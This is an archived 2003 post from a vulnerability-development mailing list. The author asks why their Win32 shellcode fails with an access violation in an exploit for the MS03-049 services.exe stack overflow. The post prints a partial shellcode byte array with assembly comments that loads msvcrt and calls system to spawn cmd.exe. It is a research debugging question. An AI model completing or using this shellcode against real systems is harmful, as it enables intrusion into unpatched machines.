Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Win32 Shellcode question.

From: "Vinay A. Mahadik" <devnull001 () fastmail fm>
Date: Thu, 27 Nov 2003 19:29:18 -0800
I was writing an exploit for the MS03-049 services.exe stack overflow vuln (from scratch for my own academic interest). Here's my shellcode to simply launch a "cmd.exe" shell. 

#define LL  0x7C4F05CF
#define SYS 0x78018EBF

char payload[] = {
 0x55,          // push        ebp
 0x8B, 0xEC,    // mov         ebp,esp

 0x33, 0xC0,    // xor         eax,eax
 0x50,          // push        eax
 0x50,          // push        eax
 0xC7, 0x45, 0xF8, 0x6D, 0x73, 0x76, 0x63,
        // mov dword ptr [ebp-8],6376736Dh
 0x66, 0xC7, 0x45, 0xFC, 0x72, 0x74,
        // mov word ptr [ebp-4],7472h
 0x8D, 0x45, 0xF8, // lea eax,[ebp-8]
 0x50,          // push        eax
 0xB8, 0xCF, 0x05, 0x4F, 0x7C,    // mov         eax,LL
 0xFF, 0xD0,    // call        eax <------------ Problem call
 0x8B, 0xE5,    // mov         esp,ebp

 0x33, 0xC0,    // xor         eax,eax
 0x50,          // push        eax
 0x50,          // push        eax
 0xC7, 0x45, 0xF8, 0x63, 0x6D, 0x64, 0x2E,
        // mov         dword ptr [ebp-8],2E646D63h
 0x66, 0xC7, 0x45, 0xFC, 0x65, 0x78,
        // mov         word ptr [ebp-4],7865h
 0xC6, 0x45, 0xFE, 0x65,
        // mov         byte ptr [ebp-2],65h
 0x8D, 0x45, 0xF8, // lea      eax,[ebp-8]
 0x50,          // push        eax
 0xB8, 0xBF, 0x8E, 0x01, 0x78,
        // mov         eax,SYS
 0xFF, 0xD0,    // call        eax
...
 };"
After the overflow, I can step through the NOP sled, and reach the above payload - meaning I have control over the CPU's exec path, and can make it execute my payload. However, I keep getting an "Access Violation" writing location.. error inside the "call eax" that corresponds with LoadLibrary("msvcrt").
I have confirmed the LL and SYS variables for the target (Win2k SP4). Plus, the payload works just fine when compiled and executed outside of services.exe . Is there something special about services.exe that prevents LoadLibraryA from executing normally or what did I do wrong? Can you spot anything I am overlooking? The same payload has worked on other stack-overflow exploits, and inside a simple main(){} loop. 

Thanks,
Vinay.
Previous By Date Next
Previous By Thread Next

Current thread: